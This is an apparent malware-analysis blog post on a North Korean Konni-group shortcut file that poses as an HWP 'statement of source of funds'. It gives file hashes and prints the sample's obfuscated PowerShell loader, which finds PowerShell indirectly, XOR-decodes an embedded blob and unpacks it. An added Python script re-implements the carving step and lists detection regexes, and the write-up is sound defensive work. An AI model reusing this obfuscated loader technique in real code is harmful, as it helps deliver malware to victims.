Malware created by the North Korean hacking group Konni, our main enemy: 자금출처명세서.lnk (2025.5.28)
Today we will look at 자금출처명세서.lnk (2025.5.28), a piece of malware created by the North Korean hacking group Konni, our main enemy.
File name: 자금출처명세서.lnk
Size: 1 MB
MD5: ba708acd2ea044fd8076dfd1bb540e77
SHA-1: 066ef37379b12dcd9e1524b936d65c0f4cca9a4a
SHA-256: d5b59f06c2505cb28d1e7e52138b40ee5af7c1fc22a1b882e026fb187dd91be5
First of all, the malware is named 자금출처명세서 (a "statement of source of funds"), and, as is typical for this group, it disguises itself as an HWP (Hancom Office Hangul) document.
PowerShell code contained in the malware
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPowershell\*(.)exe ^| finds
tr /i rshell(.)exe') do (if e(x)ist "%f" (%f "function jail{param($c?ear); <#bli?d born#>${*`
`} = $clear.substring(0,$clear.length-4) + ''; <#allow elect#>return ${*``};};function examin
ation{param($desert); r''em(o)''v(e)''-(i)t''em $d(e)sert -Force;};function wall{param($tongue,
$love,$me(d)ication,$otherwise,$pitch);<#w(r)iting off#> ${#. ]-}=Ne''w-''O''b''jec''t System
.IO.FileStream(<#resistance refer#>$tongue,<#pressure respo(n)sible#>[System.IO.FileMode]::O
pen,<#frustration championship#>[System.IO.FileAccess]::Read);<#highlight animal#> ${#. ]-}.
Seek(<#six ancient#>$love(,)[Sy(s)tem.IO.SeekOrigin]::Begin);<#hall formation#> ${[-}=$medic
ation*0x01;<#thank vote#> ${;~(}=Ne''w-O''bje''ct byte[] <#establish w(h)atever#>$medication
; <#wine political#> ${*#}=Ne''w''-O''b(j)e''ct byte[] <#book researcher#>${[-}; <#leading r
oll#>${#. ]-}.Read(<#clear after(#)>${*#},0,<#call deserve#>${[-}); ${#. ]-}.Close();${(~(#]
}=0;w(h)ile(${(~(#]} -lt $medication){<#directly provider#>${;~(}[${(~((#)]}]=${*#}[${(~(#]}
*0x01] -bxor $otherwise;${(~(#]}++;}<#me(m)ber possibly#> set''-co''nte''nt $pitch <#athleti
c certain#> ${;~(} -Enc(o)ding <#up loss#> Byte;};function tape{${(][} = $env:public<#flame
e(f)ficient#> + '\' (+)<#want concert#> 'do'+'cum'+'en'+'ts';<#s(a)nction symbol#> r(e)turn
${(][};};function flat{param($style); <#speaker widely#>${]@} = S''(p)li''(t)''-Pa''th $styl
e;<#siste(r) spiritual#> return ${]@};};f(u)nction be{param($Arab, $consider); ${``);*} = 'e
xpa'+'nd'; &${``);*} $Arab -F:* $consider;};function pride{r(e)turn G''et-''L''oc''ati''o''
n;};function plus{<#shelter civilian#>return $env:Temp;};function dig{${;} = …
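The command line above is worth unpacking from a defender's point of view. The `for /f ... dir /s /b ... findstr /i rshell.exe` loop locates powershell.exe without ever spelling out the word "powershell", the cmdlets are split with empty quotes (`Ne''w-''O''b''jec''t`), the variables are named with symbols only (`${#. ]-}`), and the `wall` function opens a carrier file, seeks to an offset, reads a fixed number of bytes, XORs every byte with a one-byte key and writes the result with `set-content -Encoding Byte`; the `be` function then runs `expand -F:*` on it, which is the Windows cabinet extractor, so the carved blob is presumably a CAB archive (my inference, not stated in the post). The Python script below is an added example and is not code from the original post or from the Konni sample: it re-implements the `wall` routine in readable form so an analyst can carve the embedded payload from a copy of the LNK once the offset, length and key have been read out of the script, and it lists the obfuscation indicators a detection rule for LNK command-line arguments could key on. Every function name, regex and sample input here is my own assumption; the sample command line is a constructed, un-defanged fragment modelled on the one shown above.

```python
import re

# Prefix of the constructed carrier used below; a real LNK would have its own header.
CARRIER_PREFIX = b"LNK-HEADER-BYTES"


def xor_carve(carrier: bytes, offset: int, length: int, key: int) -> bytes:
    """Analyst re-implementation of the sample's `wall` function (names are mine):
    seek to `offset`, read `length` bytes, XOR each byte with a one-byte `key`."""
    chunk = carrier[offset:offset + length]
    if len(chunk) != length:
        raise ValueError("carrier shorter than offset + length")
    return bytes(b ^ (key & 0xFF) for b in chunk)


def build_constructed_carrier(payload: bytes, key: int) -> bytes:
    """Builds a constructed carrier for the demo: a header followed by the
    XOR-encoded payload, the layout the `wall` routine expects."""
    return CARRIER_PREFIX + bytes(b ^ (key & 0xFF) for b in payload)


# Obfuscation indicators modelled on the command line shown in the post. The
# names and regexes are my own; a detection rule would tune them to its own data.
INDICATORS = {
    # dir /s /b over the WindowsPowershell folder piped into findstr
    "dir_findstr_powershell_lookup": re.compile(r"dir\s+/s\s+/b.*WindowsPowershell.*findstr", re.I),
    # findstr matches on a substring ("rshell") instead of the full word "powershell"
    "substring_match_avoids_powershell_keyword": re.compile(r"findstr\s+/i\s+(?!powershell)\w*shell", re.I),
    # cmdlet names broken up with empty quotes, e.g. Ne''w-''O''b''jec''t
    "quote_split_cmdlets": re.compile(r"[A-Za-z]''[A-Za-z]"),
    # junk <# ... #> block comments between tokens
    "inline_block_comments": re.compile(r"<#.*?#>", re.S),
    # ${...} variables whose name starts with a non-alphanumeric symbol
    "symbol_only_variable_names": re.compile(r"\$\{[^A-Za-z0-9_}\s][^}]*\}"),
    # single-byte XOR decode loop
    "bxor_decode_loop": re.compile(r"-bxor", re.I),
    # decoded bytes written straight to disk
    "raw_byte_write_set_content": re.compile(r"-Encoding\s+Byte", re.I),
}


def obfuscation_indicators(cmdline: str) -> list:
    """Returns the names of all indicators that fire on an LNK command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


# Constructed sample: an un-defanged fragment modelled on the post's command line.
SAMPLE_CMDLINE = (
    "/c for /f \"tokens=*\" %f in ('dir /s /b %systemroot%\\System32\\WindowsPowershell\\*.exe "
    "^| findstr /i rshell.exe') do (if exist \"%f\" (%f \"function jail{param($clear); "
    "<#blind born#>${*`} = $clear.substring(0,$clear.length-4) + ''; return ${*`};};"
    "function wall{param($tongue,$love,$medication,$otherwise,$pitch); "
    "${#. ]-}=Ne''w-''O''b''jec''t System.IO.FileStream($tongue,[System.IO.FileMode]::Open,"
    "[System.IO.FileAccess]::Read); ${#. ]-}.Seek($love,[System.IO.SeekOrigin]::Begin); "
    "${;~(}[${(~(#]}]=${*#}[${(~(#]}*0x01] -bxor $otherwise; "
    "set''-co''nte''nt $pitch ${;~(} -Encoding Byte;}\"))"
)


if __name__ == "__main__":
    # Constructed payload: a CAB-style "MSCF" magic followed by zero bytes.
    payload = b"MSCF" + bytes(12)
    carrier = build_constructed_carrier(payload, key=0x5A)
    carved = xor_carve(carrier, len(CARRIER_PREFIX), len(payload), 0x5A)
    print("carved payload matches:", carved == payload)
    print("indicators on sample:", obfuscation_indicators(SAMPLE_CMDLINE))
    print("indicators on benign:", obfuscation_indicators("/c notepad.exe readme.txt"))
```

On a real sample you would pull the offset, length and key out of the call to `wall` in the de-obfuscated script, run `xor_carve` over the 1 MB LNK file, and check the first bytes of the result before handing it to a sandbox; the indicator list is meant as a starting point for an LNK-inspection rule, not as a complete signature.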
IoC
ba708acd2ea044fd8076dfd1bb540e77
066ef37379b12dcd9e1524b936d65c0f4cca9a4a
d5b59f06c2505cb28d1e7e52138b40ee5af7c1fc22a1b882e026fb187dd91be5